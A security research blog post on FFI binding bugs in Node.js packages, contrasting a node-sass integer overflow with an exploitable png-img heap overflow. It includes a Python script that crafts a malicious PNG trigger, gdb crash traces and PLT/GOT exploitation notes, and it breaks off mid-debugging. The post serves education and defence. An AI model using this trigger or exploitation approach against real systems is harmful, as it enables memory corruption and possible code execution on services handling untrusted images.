December 7, 2020

Now you C me, now you don't, part two: exploiting the in-between

Bas Alberts

In the first installment of this series on the native attack surface of interpreted languages, we learned that even in core implementations of interpreted languages such as JavaScript, Python and Perl, memory safety is not always a guarantee.

In this second installment we’ll take a deeper dive into how vulnerabilities may be introduced when gluing C/C++ based libraries into interpreted languages through a Foreign Function Interface (FFI). As we discussed previously, an FFI is an interface between code written in two different languages, for example one that makes a C based library available for use in a JavaScript program.

The FFI is responsible for translating objects from language A into something that language B can work with, and vice versa. To facilitate this translation, a developer has to write language API specific code that enables the back and forth between the two languages. This is often also referred to as writing language bindings.

From an attacker viewpoint, foreign language bindings represent an interesting attack surface. When dealing with an FFI that translates from a memory safe language into a memory unsafe language such as C/C++, there exists the potential for developers to introduce memory safety bugs.

Even when the higher level language is considered memory safe, and even when the targeted foreign code has received considerable security scrutiny, there may lurk exploitable vulnerabilities in the in-between; the code that bridges the gap between the two languages.

In this post we’re going to take a closer look at two such bugs and we’ll take a step by step journey through how an attacker evaluates exploitability of your code. The aim is to provide you with a high level understanding of the exploit development process, not just for a specific case, but from a conceptual perspective as well. By understanding how an exploit developer thinks about your code, you’ll be able to build defensive programming habits that will help you write more secure code.

For our case study we’re going to compare and contrast two bugs that look similar, yet one is just a bug while the other is a vulnerability. Both existed in C/C++ bindings for Node.js packages.

node-sass

Node-sass provides Node.js bindings to LibSass, which is a C implementation of the Sass stylesheet preprocessor. While node-sass was recently deprecated, it still receives some 5 million+ downloads a week from the NPM package registry so it makes for a potentially interesting audit surface.

When reading the node-sass bindings we note the following code pattern:

 int indent_len = Nan::To<int32_t>(
    Nan::Get(
        options,
        Nan::New("indentWidth").ToLocalChecked()
    ).ToLocalChecked()).FromJust();


[1]
  ctx_w->indent = (char*)malloc(indent_len + 1);


  strcpy(ctx_w->indent, std::string(
[2]
    indent_len,
    Nan::To<int32_t>(
        Nan::Get(
            options,
            Nan::New("indentType").ToLocalChecked()
        ).ToLocalChecked()).FromJust() == 1 ? '\t' : ' '
    ).c_str());

At [1] we note that a user-controlled 32-bit integer value is used to allocate memory. If this user-supplied integer is -1, the integer arithmetic expression indent_len + 1 evaluates to 0. At [2] the original negative value is then used to create a tab or space string of indent_len characters. Because the std::string constructor expects an unsigned length parameter of type size_t, the negative indent_len value is converted to a very large positive value.
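The arithmetic at [1] and [2] can be modeled in a few lines of Python. This is only a sketch: it assumes a 64-bit platform where size_t is 64 bits wide, and the helper name to_size_t is illustrative rather than anything that exists in node-sass.

```python
# Model C's signed-to-unsigned conversion with an explicit mask.
# Assumption: size_t is 64 bits wide on the target platform.
SIZE_T_MASK = (1 << 64) - 1


def to_size_t(value: int) -> int:
    """Convert a signed integer to size_t the way C does (modulo 2**64)."""
    return value & SIZE_T_MASK


indent_len = -1                           # user-supplied indentWidth
malloc_size = to_size_t(indent_len + 1)   # [1] malloc(indent_len + 1)
string_len = to_size_t(indent_len)        # [2] std::string(indent_len, ch)

print(hex(malloc_size))  # 0x0
print(hex(string_len))   # 0xffffffffffffffff
```

The allocation request collapses to zero bytes while the requested string length becomes the largest value size_t can hold.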

At the JS API level we note indentWidth is retrieved as follows:

/**
 * Get indent width
 *
 * @param {Object} options
 * @api private
 */


function getIndentWidth(options) {
  var width = parseInt(options.indentWidth) || 2;


  return width > 10 ? 2 : width;
}

The intent here is to ensure that indentWidth is >= 2 and <= 10, but only the upper bound is actually checked, and parseInt allows us to supply a negative value, e.g.:

var sass = require('node-sass')
var result = sass.renderSync({
        data: `h1 { font-size: 40px; }`,
        indentWidth: -1
});

This will trigger an integer overwrap, which results in an underallocation and potentially subsequent memory corruption.

To remediate this, node-sass should ensure that both the lower and upper bounds of the user supplied indentWidth value are checked before handing this value off to the lower level binding.

Sanity checking your inputs and explicitly limiting their value ranges to what makes sense for the logic of your program will serve you well as a general defensive programming habit.
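As a rough illustration of checking both bounds, here is a Python model of the getIndentWidth logic next to a stricter variant. It is a sketch, not the node-sass fix: the function names are hypothetical, the input is assumed to have already been parsed to an integer, and the lower bound of 0 is an assumption made for the example.

```python
DEFAULT_WIDTH = 2
MAX_WIDTH = 10
MIN_WIDTH = 0  # assumed lower bound; the point is only that negatives are rejected


def indent_width_original(width: int) -> int:
    """Model of getIndentWidth: only the upper bound is checked."""
    width = width or DEFAULT_WIDTH
    return DEFAULT_WIDTH if width > MAX_WIDTH else width


def indent_width_checked(width: int) -> int:
    """Stricter variant: anything outside [MIN_WIDTH, MAX_WIDTH] gets the default."""
    width = width or DEFAULT_WIDTH
    return width if MIN_WIDTH <= width <= MAX_WIDTH else DEFAULT_WIDTH


print(indent_width_original(-1))  # -1
print(indent_width_checked(-1))   # 2
```

With the range check in place, a negative width never reaches the native binding.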

So let’s recap. What is the bug pattern here? An integer overflow, resulting in heap underallocation, followed by a memory population that may corrupt adjacent heap memory. That certainly sounds CVE-worthy, doesn’t it?

However, while this integer overflow does lead to an underallocation of heap memory, this bug does not represent a vulnerability as this stylesheet input is most likely not attacker controlled and a std::string exception will occur before any heap corruption happens. Even if heap corruption were to occur, it would be a very limited-control overwrite with either tab or space characters based on a very large indent_len with a low likelihood of practical exploitability.

anticomputer@dc1:~$ node sass.js
terminate called after throwing an instance of 'std::length_error'
  what():  basic_string::_S_create
Aborted (core dumped)

Conclusion: just a bug.

For a bug like this to be interesting to an attacker, the attacker needs a foothold of influence on the input that triggers the bug. In this case it’s not very likely that anyone is providing attacker controlled input to the node-sass bindings. The memory corruption primitive itself would also be very limited in control. While there do exist scenarios in which even very limited heap corruption is sufficient to fully exploit a bug, generally an attacker is looking for some level of control over what the memory is corrupted with or, bar that, how much of the memory is overwritten. Preferably both.

In this case, even if the std::string constructor was not bailing out, the attacker would have to somehow turn a very large overwrite with space or tab characters into control of the process. While this is not entirely impossible, given sufficient influence and control of the surrounding memory layout, it is also not very likely.

In these kinds of scenarios we can usually apply a simple exploitability “smell test” by answering the following three questions:

  1. How does the attacker trigger the bug?
  2. What data does the attacker control and to which extent?
  3. Which algorithms are influenced by the attacker control?

Beyond that, exploitability is mostly a function of attacker goals, experience, and resources. None of which you necessarily have any insight into. Unless you spend a lot of time actually writing exploits (and even when you do), it can be very hard to exhaustively determine whether or not something is exploitable. Especially if your code is used by other software, i.e. library code, or is a component in a much larger system. Bugs that look like just bugs in an isolated context may be vulnerabilities in the larger scheme of things.

While common sense goes a long way towards establishing exploitability, any bug that can be triggered by user controlled input (or influence) is a potential vulnerability and, where time and resources allow, it makes sense to treat them as such.

png-img

For our second case study, we’re going to examine GHSL-2020-142. This bug existed in the Node.js png-img package, which provides libpng bindings.

When loading a PNG image for processing, the png-img bindings employ the PngImg::InitStorage_ function to allocate the initial memory required for the user supplied PNG data.

void PngImg::InitStorage_() {
    rowPtrs_.resize(info_.height, nullptr);
[1]
    data_ = new png_byte[info_.height * info_.rowbytes];


[2]
    for(size_t i = 0; i < info_.height; ++i) {
        rowPtrs_[i] = data_ + i * info_.rowbytes;
    }
}

At [1] we observe the allocation of a png_byte array of size info_.height * info_.rowbytes. Both the height and rowbytes structure members are of type png_uint_32, which implies the integer arithmetic expression here is explicitly an unsigned 32-bit integer operation.

info_.height may be directly supplied from a PNG file as a 32-bit integer and info_.rowbytes is derived from the PNG data as well.

This multiplication may trigger an integer overwrap which results in an underallocation of the data_ memory region.

For example, if we set info_.height to 0x01000001 with an info_.rowbytes value of 0x100, the resulting expression would be (0x01000001 * 0x100) & 0xffffffff which wraps to a value of 0x100. As a result data_ would be underallocated as a 0x100 sized png_byte array.
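The wrap can be reproduced with a mask standing in for 32-bit unsigned arithmetic. The sketch below also shows one hypothetical defensive variant that rejects sizes that do not fit. Both function names are made up for illustration and are not part of png-img.

```python
UINT32_MASK = 0xFFFFFFFF


def alloc_size_u32(height: int, rowbytes: int) -> int:
    """Size as computed by unsigned 32-bit multiplication (wraps modulo 2**32)."""
    return (height * rowbytes) & UINT32_MASK


def checked_alloc_size(height: int, rowbytes: int) -> int:
    """Hypothetical defensive variant: refuse sizes that do not fit in 32 bits."""
    size = height * rowbytes  # Python integers do not wrap
    if size > UINT32_MASK:
        raise OverflowError("height * rowbytes exceeds 32 bits")
    return size


wrapped = alloc_size_u32(0x01000001, 0x100)
print(hex(wrapped))  # 0x100
```

The true product is 0x100000100. Only the low 32 bits survive, which is where the 0x100 byte allocation comes from.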

Subsequently, at [2], the rowPtrs_ array will be populated with row-data pointers that point outside of the bounds of the allocated memory region since the for loop conditional operates on the original info_.height value.
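To get a feel for how far the row pointers stray, the following sketch counts how many rows fit inside the underallocated buffer. It assumes a nonzero rowbytes value, and the function name is hypothetical.

```python
def row_pointer_summary(height: int, rowbytes: int, alloc_size: int):
    """Return (rows fully in bounds, rows out of bounds, first out-of-bounds offset).

    Row i starts at offset i * rowbytes, mirroring data_ + i * info_.rowbytes.
    Assumes rowbytes > 0.
    """
    in_bounds = min(height, alloc_size // rowbytes)
    first_oob = in_bounds * rowbytes if in_bounds < height else None
    return in_bounds, height - in_bounds, first_oob


in_bounds, out_of_bounds, first_oob = row_pointer_summary(0x01000001, 0x100, 0x100)
print(in_bounds, hex(out_of_bounds), hex(first_oob))  # 1 0x1000000 0x100
```

With the example values only the first row lands inside data_. Every other row pointer refers to memory past the end of the allocation.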

Once the actual row data is read from the PNG file, any adjacent memory to the data_ region may be overwritten with attacker controlled row data up to info_.height * info_.rowbytes bytes, affording a great deal of process memory control to any would-be attacker.

Note that this overwrite may be halted early according to attacker wishes by simply not supplying sufficient amounts of row-data from the PNG itself, at which point libpng error routines would kick in. Any subsequent program logic handling the error paths would then operate on corrupted heap memory.

This most likely results in a highly controlled heap overflow in terms of both contents and size and our intuition is that this bug could be an exploitable vulnerability.

Let’s answer our exploitability questions to establish whether or not this bug is interesting for an attacker to pursue.

How does the attacker trigger the bug?

This bug is triggered from an attacker supplied PNG file. The attacker has full control of any data derived from the PNG that is acted upon in the png-img bindings, bar any restrictions imposed by file format sanity checks.

Because the attacker has to rely on a malicious PNG file being loaded, we can assume that any exploitation logic will likely have to be contained within this single PNG file. This means that there is likely less opportunity for an attacker to repeatedly interact with the targeted Node.js process to e.g. establish information leaks that aid in subsequent exploitation aimed at bypassing any system level mitigations such as Address Space Layout Randomization (ASLR).

We say likely, because we can not predict how png-img is actually used. There may exist use-cases in which repeatable interactions that trigger the bug or that further aid exploitation of the bug are possible.

What data does the attacker control and to which extent?

The attacker can supply the height and rowbytes variables required for granular control of the integer arithmetic and subsequent integer wrap. The wrapped value is used to determine the final allocation size of the data_ array. They can also supply fully controlled row data from the PNG image itself, which is populated into out-of-bounds memory by way of the out-of-bounds pointer values in the rowPtrs_ array. They have granular control over how much of this attacker supplied row data is populated into memory via early termination of the supplied row data.

In short, the attacker can overwrite any data_ adjacent heap memory with a high level of control both in terms of contents and length.

Which algorithms are influenced by the attacker control?

Since we are dealing with a heap overflow, the attacker influence extends to any algorithm that is potentially acting on the corrupted heap memory. This may involve Node.js interpreter code, system library code, and of course the bindings and any associated library code itself.

Putting on our attacker glasses

From an attacker perspective, understanding what we control, how we control it, and what we can influence is crucial for establishing exploitability. Exploitability is also affected by how and where the targeted code is actually used.

If we’re dealing with a bug in library code, this library may be used in much larger software that affords all sorts of additional interaction and influence to us as attackers. Additionally, the operating environment in which the bug is triggered is also very important. Operating systems, the hardware they run on, and their software ecosystems all have varying degrees of system level mitigations enabled across a variety of configurations. A vulnerability that may be stopped by a mitigation on one OS may be fully exploitable on another.

In the case of png-img, let’s assume the most basic attacker scenario we can imagine: a single JavaScript file that requires the png-img package and then uses it to load an attacker supplied PNG file.

var fs = require('fs');
PngImg = require('png-img');
var buf = fs.readFileSync('/home/anticomputer/trigger.png');
img = new PngImg(buf);

Most modern memory corruption exploits require some sort of insight into the target process memory layout. Since we are rewriting memory, knowing where things live in the original memory layout helps us to construct alternate, yet functional, memory contents for the target process to operate on.

As attackers we hope to abuse these new memory contents to trick the algorithms acting on them to perform actions that are beneficial to us as an attacker. Generally the goal is to achieve arbitrary code or command execution, but attacker goals can range to much more esoteric behavior as well. For example, an attacker may rewrite authentication flags, weaken random number generators, or otherwise subvert security critical logic in the software. Beyond that, even just making a process unavailable can be a goal in itself and can result in unexpected security impact.

Insights into memory layouts can be established either due to a lack of memory layout mitigations, in which case we can make blind assumptions about a given target binary and its associated memory layout, or via infoleaks.

Infoleaks can be as straightforward as leaking the contents of memory through additional or repurposed bugs and as esoteric as using timing or crash based probes to establish where a certain section of process memory might exist for a given library. As a caveat, being able to use infoleaks to further an exploitation agenda generally requires repeated interaction with a targeted process.

Since in our single-shot scenario, we won’t be able to retrieve insights into the target process dynamically, we will have to rely on a combination of luck and educated guesses about where things will be located in memory at the time that we trigger our memory corruption.

First we enumerate what kind of mitigations we have to deal with for the target node binary. For this we use the checksec convenience command included in the GDB Enhanced Features (GEF) plugin.

Reading symbols from /usr/bin/node...done.
gef➤  checksec
[+] checksec for '/usr/bin/node'
Canary                        : ✓
NX                            : ✓
PIE                           : ✘
Fortify                       : ✘
RelRO                         : Full
gef➤

We can see that our target binary is not a Position Independent Executable (PIE). That means that .text and .data sections of the node executable will most likely exist in the same places in memory for every run of this specific binary on the same platform. This is very helpful in our single-shot scenario, because this knowledge gives us a hook into known locations for executable code and program data. If the node binary on our test platform had been compiled as a PIE, practical exploitation of this vulnerability in a blind (i.e. remote) single-shot scenario would be significantly frustrated due to Address Space Layout Randomization (ASLR) support extending to PIE binaries on modern Linux.

If we didn’t have something like GEF’s checksec available, we could also just use the file command. Since PIE binaries are simply ELF executables with type ET_DYN (shared object file), they will report as shared libraries, whereas non-PIE binaries are of type ET_EXEC (executable file). For example, if we compare the non-PIE Node binary to the PIE bash binary on our test platform (x86_64 Ubuntu 18.04.4 LTS), we note the following:

anticomputer@dc1:~$ file /bin/bash
/bin/bash: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=12f73d7a8e226c663034529c8dd20efec22dde54, stripped


anticomputer@dc1:~$ file /usr/bin/node
/usr/bin/node: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.18, BuildID[sha1]=ee756495e98cf6163ba85e13b656883fe0066062, with debug_info, not stripped
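The distinction that file reports can also be read straight from the ELF header, where the two-byte e_type field sits at offset 16. The helper below is a minimal sketch with a hypothetical name. It only distinguishes ET_EXEC (2) from ET_DYN (3) and does not attempt to tell a PIE apart from an ordinary shared library.

```python
import struct

ET_NAMES = {2: "ET_EXEC (non-PIE executable)", 3: "ET_DYN (PIE or shared object)"}


def elf_type(header: bytes) -> str:
    """Classify an ELF file from its first 18 bytes using the e_type field."""
    if len(header) < 18 or header[:4] != b"\x7fELF":
        raise ValueError("not an ELF header")
    # EI_DATA (byte 5) gives the byte order: 1 = little-endian, 2 = big-endian.
    endian = "<" if header[5] == 1 else ">"
    (e_type,) = struct.unpack_from(endian + "H", header, 16)
    return ET_NAMES.get(e_type, f"other ({e_type})")
```

Passing it the first 18 bytes of a binary, read with open(path, 'rb'), should agree with the "executable" versus "shared object" wording in the file output above.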

A plan of attack

Now that we know our operating environment and which memory contents are likely known to us at the time of our exploitation attempt, we can start making decisions about which algorithms we want to subvert with our heap memory control.

In this case three potential choices come to mind, ranging from application specific to platform specific.

  1. We can attack the png-img and libpng logic operating on the corrupted heap memory
  2. We can attack the Node.js interpreter logic operating on the corrupted heap memory
  3. We can attack the system libraries operating on the corrupted heap memory

Which of the three makes the most sense for us to pursue is mostly a decision based around how much time and effort we’re willing to put into our exploitation attempt. A Proof of Concept level effort warrants taking the most convenient exploitation route available to us. To determine which route that is, we have to go live with the vulnerability and perform some dynamic analysis.

Crafting a trigger

So far we’ve theorized about a lot of things. We’ve explored the kinds of considerations we make with our attacker hat on to determine whether or not a bug is worth pursuing from an exploitation perspective. Now that we’ve decided that we want to try and exploit our png-img bug fully, it is time to start playing around with the bug itself.

First let’s distill down to a base trigger for the bug. We want to create a PNG file that will trigger the integer overwrap, cause an underallocation of the data_ array, and subsequently overwrite heap memory using our crafted PNG row data. We also have to pass some checksum sanity checks in libpng’s PNG chunk parsing in order to ensure our malicious PNG data is accepted for further processing.

PNG files are composed of a PNG signature followed by a series of PNG chunks. Chunks break down into a 4-byte chunk length, a 4-byte chunk type, a variable length chunk data, and a 4-byte CRC checksum on the chunk type and data. The first chunk in a PNG is the IHDR chunk, which among other things specifies the width and height of the image.
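The chunk layout described above can be walked with a short parser. This is a sketch for inspecting files, not a validating decoder. The names iter_chunks and make_chunk are our own, and only Python's standard struct and zlib modules are used.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def make_chunk(ctype: bytes, data: bytes) -> bytes:
    """Build a chunk: length, type, data, then a CRC over type and data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def iter_chunks(png: bytes):
    """Yield (type, data, crc_ok) for each chunk in a PNG byte string."""
    if png[:8] != PNG_SIGNATURE:
        raise ValueError("missing PNG signature")
    offset = 8
    while offset + 12 <= len(png):
        (length,) = struct.unpack_from(">I", png, offset)
        if offset + 12 + length > len(png):
            raise ValueError("truncated chunk")
        ctype = png[offset + 4:offset + 8]
        data = png[offset + 8:offset + 8 + length]
        (crc,) = struct.unpack_from(">I", png, offset + 8 + length)
        yield ctype, data, (zlib.crc32(ctype + data) & 0xFFFFFFFF) == crc
        offset += 12 + length
```

For the IHDR chunk, the first eight data bytes are the big-endian width and height, which is where the values of interest for this bug live.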

If we recall from the vulnerable png-img bindings code, the image height is one of the variables we need to control to trigger the integer overwrap. The other variable is the number of bytes in a row. Let’s take a look at how png-img, and subsequently libpng populate this data from our supplied PNG file.

The main entry point into loading PNG data in png-img is the PngImg::PngImg constructor, which reads as follows:

PngImg::PngImg(const char* buf, const size_t bufLen)
    : data_(nullptr)
{
    memset(&info_, 0, sizeof(info_));
    PngReadStruct rs;
    if(rs.Valid()) {
        BufPtr bufPtr = {buf, bufLen};
        png_set_read_fn(rs.pngPtr, (png_voidp)&bufPtr, readFromBuf);
[1]
        ReadInfo_(rs);


        InitStorage_();
        png_read_image(rs.pngPtr, &rowPtrs_[0]);
    }
}

At [1] this calls ReadInfo_ which is the function that actually populates most of the PNG information by way of libpng’s png_read_info function.

void PngImg::ReadInfo_(PngReadStruct& rs) {
    png_read_info(rs.pngPtr, rs.infoPtr);
    info_.width = png_get_image_width(rs.pngPtr, rs.infoPtr);
    info_.height = png_get_image_height(rs.pngPtr, rs.infoPtr);
    info_.bit_depth = png_get_bit_depth(rs.pngPtr, rs.infoPtr);
    info_.color_type = png_get_color_type(rs.pngPtr, rs.infoPtr);
    info_.interlace_type = png_get_interlace_type(rs.pngPtr, rs.infoPtr);
    info_.compression_type = png_get_compression_type(rs.pngPtr, rs.infoPtr);
    info_.filter_type = png_get_filter_type(rs.pngPtr, rs.infoPtr);
    info_.rowbytes = png_get_rowbytes(rs.pngPtr, rs.infoPtr);
    info_.pxlsize = info_.rowbytes / info_.width;
}

png_read_info will cycle through all the various PNG chunks to extract information about the PNG image. To process IHDR chunks, it calls into png_handle_IHDR.

/* Read and check the IDHR chunk */
void /* PRIVATE */
png_handle_IHDR(png_structrp png_ptr, png_inforp info_ptr, png_uint_32 length)
{
   png_byte buf[13];
   png_uint_32 width, height;
   int bit_depth, color_type, compression_type, filter_type;
   int interlace_type;


   png_debug(1, "in png_handle_IHDR");


   if (png_ptr->mode & PNG_HAVE_IHDR)
      png_chunk_error(png_ptr, "out of place");


   /* Check the length */
   if (length != 13)
      png_chunk_error(png_ptr, "invalid");


   png_ptr->mode |= PNG_HAVE_IHDR;


   png_crc_read(png_ptr, buf, 13);
   png_crc_finish(png_ptr, 0);


[1]
   width = png_get_uint_31(png_ptr, buf);
   height = png_get_uint_31(png_ptr, buf + 4);
   bit_depth = buf[8];
   color_type = buf[9];
   compression_type = buf[10];
   filter_type = buf[11];
   interlace_type = buf[12];


   /* Set internal variables */
   png_ptr->width = width;
   png_ptr->height = height;
   png_ptr->bit_depth = (png_byte)bit_depth;
   png_ptr->interlaced = (png_byte)interlace_type;
   png_ptr->color_type = (png_byte)color_type;
#ifdef PNG_MNG_FEATURES_SUPPORTED
   png_ptr->filter_type = (png_byte)filter_type;
#endif
   png_ptr->compression_type = (png_byte)compression_type;


   /* Find number of channels */
   switch (png_ptr->color_type)
   {
      default: /* invalid, png_set_IHDR calls png_error */
      case PNG_COLOR_TYPE_GRAY:
      case PNG_COLOR_TYPE_PALETTE:
         png_ptr->channels = 1;
         break;


      case PNG_COLOR_TYPE_RGB:
         png_ptr->channels = 3;
         break;


      case PNG_COLOR_TYPE_GRAY_ALPHA:
         png_ptr->channels = 2;
         break;


      case PNG_COLOR_TYPE_RGB_ALPHA:
         png_ptr->channels = 4;
         break;
   }


   /* Set up other useful info */
   png_ptr->pixel_depth = (png_byte)(png_ptr->bit_depth *
   png_ptr->channels);
[2]
   png_ptr->rowbytes = PNG_ROWBYTES(png_ptr->pixel_depth, png_ptr->width);
   png_debug1(3, "bit_depth = %d", png_ptr->bit_depth);
   png_debug1(3, "channels = %d", png_ptr->channels);
   png_debug1(3, "rowbytes = %lu", (unsigned long)png_ptr->rowbytes);
   png_set_IHDR(png_ptr, info_ptr, width, height, bit_depth,
       color_type, interlace_type, compression_type, filter_type);
}

At [1] we see it pulling the width and height integers from the IHDR chunk data and at [2] we see it derive the rowbytes value via the PNG_ROWBYTES macro, which is a simple transformation of the pixel width into the number of bytes required to represent the row according to the number of bits a single pixel occupies. For example, for 8 bit pixels, a width of 16 pixels implies 16 rowbytes.
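The transformation PNG_ROWBYTES performs can be written out in Python. This sketch follows the macro as we understand it from libpng's private headers: whole bytes per pixel when the pixel depth is at least 8 bits, otherwise the bit count rounded up to a byte. The function name is our own.

```python
def png_rowbytes(pixel_bits: int, width: int) -> int:
    """Bytes needed for one row of `width` pixels at `pixel_bits` bits per pixel."""
    if pixel_bits >= 8:
        return width * (pixel_bits >> 3)
    # Sub-byte pixels are packed, so round the total bit count up to whole bytes.
    return (width * pixel_bits + 7) >> 3


print(png_rowbytes(8, 16))     # 16
print(png_rowbytes(8, 0x100))  # 256
```

For 8 bit grayscale the row size equals the width, which is why controlling the image width gives direct control of rowbytes.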

We also note the population of the png_ptr structure, which is a heap based libpng data structure that contains all the PNG specific data. It includes a variety of function pointers that are called when libpng is operating on our PNG data. For example, when libpng encounters an error, it will call into png_error.

PNG_FUNCTION(void,PNGAPI
png_error,(png_const_structrp png_ptr, png_const_charp error_message),
   PNG_NORETURN)
{
…
[1]
   if (png_ptr != NULL && png_ptr->error_fn != NULL)
      (*(png_ptr->error_fn))(png_constcast(png_structrp,png_ptr),
          error_message);


   /* If the custom handler doesn't exist, or if it returns,
      use the default handler, which will not return. */
   png_default_error(png_ptr, error_message);
}

At [1] we see that if the png_ptr structure has a populated error_fn function pointer field, this function pointer will be called with the png_ptr structure itself passed as its first argument.

Taking note of how our affected software interacts with the memory we may be able to control is important from an attacker perspective. In this case we’ve established that there is a heap based structure used by libpng that contains function pointers which are called when errors occur. This may be useful to us in our exploitation journey as a method of redirecting execution, so we make a note of this.

If we were to rely on corrupting the png_ptr structure, that would be an example of abusing application specific heap data.

Long story short, assuming 8 bit pixels, we can control the row bytes value as a direct derivative of the image width. So to trigger the png-img bug we just have to create a valid PNG file that contains a height and width that will trigger the integer overwrap and supply enough row data to overwrite data_ adjacent heap memory.

We can quickly mock that up using the Python Pillow library:

from PIL import Image
import os
import struct
import sys
import zlib


def patch(path, offset, data):
    # overwrite len(data) bytes in place at the given file offset
    with open(path, 'r+b') as f:
        f.seek(offset)
        f.write(data)


trigger = 'trigger.png'
row_data = b'A' * 0x100000
width = 0x100
height = int(len(row_data)/width)


# create a template PNG with a valid height for our row_data
im = Image.frombytes("L", (width, height), row_data)
im.save(trigger, "PNG")


# patch in a wrapping size to trigger overwrap and underallocation
patch(trigger, 20, struct.pack('>L', 0x01000001))


# fix up the IHDR CRC so png_read_info doesn't freak out
with open(trigger, 'rb') as f:
    f.seek(16)
    ihdr_data = f.read(13)
crc = zlib.crc32(ihdr_data, zlib.crc32(b'IHDR') & 0xffffffff) & 0xffffffff
patch(trigger, 29, struct.pack('>L', crc))

When we load the resulting png file using png-img we observe the following crash:

(gdb) r pngimg.js
Starting program: /usr/bin/node pngimg.js
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
[New Thread 0x7ffff6a79700 (LWP 60942)]
[New Thread 0x7ffff6278700 (LWP 60943)]
[New Thread 0x7ffff5a77700 (LWP 60944)]
[New Thread 0x7ffff5276700 (LWP 60945)]
[New Thread 0x7ffff4a75700 (LWP 60946)]
[New Thread 0x7ffff7ff6700 (LWP 60947)]


Thread 1 "node" received signal SIGSEGV, Segmentation fault.
0x00007ffff7de4e52 in _dl_fixup (l=0x271f0a0, reloc_arg=285) at ../elf/dl-runtime.c:69
69      ../elf/dl-runtime.c: No such file or directory.
(gdb) x/i$pc
=> 0x7ffff7de4e52 <_dl_fixup+18>:       mov    0x8(%rax),%rdi
(gdb) bt
#0  0x00007ffff7de4e52 in _dl_fixup (l=0x271f0a0, reloc_arg=285) at ../elf/dl-runtime.c:69
#1  0x00007ffff7dec81a in _dl_runtime_resolve_xsavec () at ../sysdeps/x86_64/dl-trampoline.h:125
#2  0x00007ffff4032e63 in png_read_row () from /home/anticomputer/node_modules/png-img/build/Release/png_img.node
#3  0x00007ffff4034899 in png_read_image ()
   from /home/anticomputer/node_modules/png-img/build/Release/png_img.node
#4  0x00007ffff40246d8 in PngImg::PngImg(char const*, unsigned long) ()
   from /home/anticomputer/node_modules/png-img/build/Release/png_img.node
#5  0x00007ffff401e8fa in PngImgAdapter::New(Nan::FunctionCallbackInfo<v8::Value> const&) ()
   from /home/anticomputer/node_modules/png-img/build/Release/png_img.node
#6  0x00007ffff401e56f in Nan::imp::FunctionCallbackWrapper ()
   from /home/anticomputer/node_modules/png-img/build/Release/png_img.node
...
(gdb) i r rax
rax            0x4141414141414141       4702111234474983745
(gdb)

We see that we crashed due to _dl_fixup operating on heap memory which was overwritten by our row data which consisted of a large amount of A bytes (0x41).

So something process critical was acting on the heap data we control, and there was a subsequent crash. We see that the last libpng function called before crashing in _dl_fixup was png_read_row.

If you recall, our initial theory for exploitation was that we would perhaps be able to corrupt the png_ptr data on the heap and then trigger an error case that resulted in libpng calling to a function pointer value we supply to png_error when it runs out of row data. But instead of crashing in png_error, we crashed in _dl_fixup.

So what’s going on here? Well, first let’s make sure that png_read_row is in fact trying to call png_error. If we look at the disassembly for png_read_row we note the following:

   0x00007ffff4032e45 <+1173>:  lea    0x335ff(%rip),%rsi        # 0x7ffff406644b
   0x00007ffff4032e4c <+1180>:  mov    %rbx,%rdi
   0x00007ffff4032e4f <+1183>:  callq  0x7ffff401d980 <png_error@plt>
   0x00007ffff4032e54 <+1188>:  lea    0x339c5(%rip),%rsi        # 0x7ffff4066820
   0x00007ffff4032e5b <+1195>:  mov    %rbx,%rdi
   0x00007ffff4032e5e <+1198>:  callq  0x7ffff401d980 <png_error@plt>
   0x00007ffff4032e63 <+1203>:  lea    0x335fb(%rip),%rsi        # 0x7ffff4066465
   0x00007ffff4032e6a <+1210>:  mov    %rbx,%rdi
   0x00007ffff4032e6d <+1213>:  callq  0x7ffff401d980 <png_error@plt>

We note that png_error is called via the procedure linkage table. The first argument is the png_ptr structure pointer passed through the rdi register and the second argument is the error message passed through the rsi register. Let’s set a breakpoint on png_error@plt to see what gives.

(gdb) break png_error@plt
Breakpoint 1 at 0x7ffff401d980
(gdb) r pngimg.js
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /usr/bin/node pngimg.js
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
[New Thread 0x7ffff6a79700 (LWP 60976)]
[New Thread 0x7ffff6278700 (LWP 60977)]
[New Thread 0x7ffff5a77700 (LWP 60978)]
[New Thread 0x7ffff5276700 (LWP 60979)]
[New Thread 0x7ffff4a75700 (LWP 60980)]
[New Thread 0x7ffff7ff6700 (LWP 60981)]


Thread 1 "node" hit Breakpoint 1, 0x00007ffff401d980 in png_error@plt ()
   from /home/anticomputer/node_modules/png-img/build/Release/png_img.node
(gdb) bt
#0  0x00007ffff401d980 in png_error@plt ()
   from /home/anticomputer/node_modules/png-img/build/Release/png_img.node
#1  0x00007ffff4032e63 in png_read_row () from /home/anticomputer/node_modules/png-img/build/Release/png_img.node
…
(gdb) x/s $rsi
0x7ffff4066820: "Invalid attempt to read row data"
(gdb) x/16x $rdi
0x271f580:      0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0x271f588:      0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
(gdb)

So far so good! We are indeed attempting to call png_error with controlled png_ptr data. But why do we crash in _dl_fixup instead of gaining function pointer control?

Well, png_error is a fatal error handler. Since this is the first time png_error has been called, due to lazy linking it has not actually been resolved and relocated yet. So what’s happening is that the instructions in the Procedure Linkage Table (PLT) will try to jump to the address contained in the Global Offset Table (GOT) jump slot entry for png_error, but this address points right back into the png_error PLT entry which contains instructions that are responsible for invoking the dynamic linker’s runtime resolver.

We can step through this process to get a better handle on it.

Thread 1 "node" hit Breakpoint 1, 0x00007ffff401d980 in png_error@plt ()
   from /home/anticomputer/node_modules/png-img/build/Release/png_img.node
1: x/i $pc
=> 0x7ffff401d980 <png_error@plt>:      jmpq   *0x256f7a(%rip)        # 0x7ffff4274900
(gdb) x/gx 0x7ffff4274900
0x7ffff4274900: 0x00007ffff401d986
(gdb) si
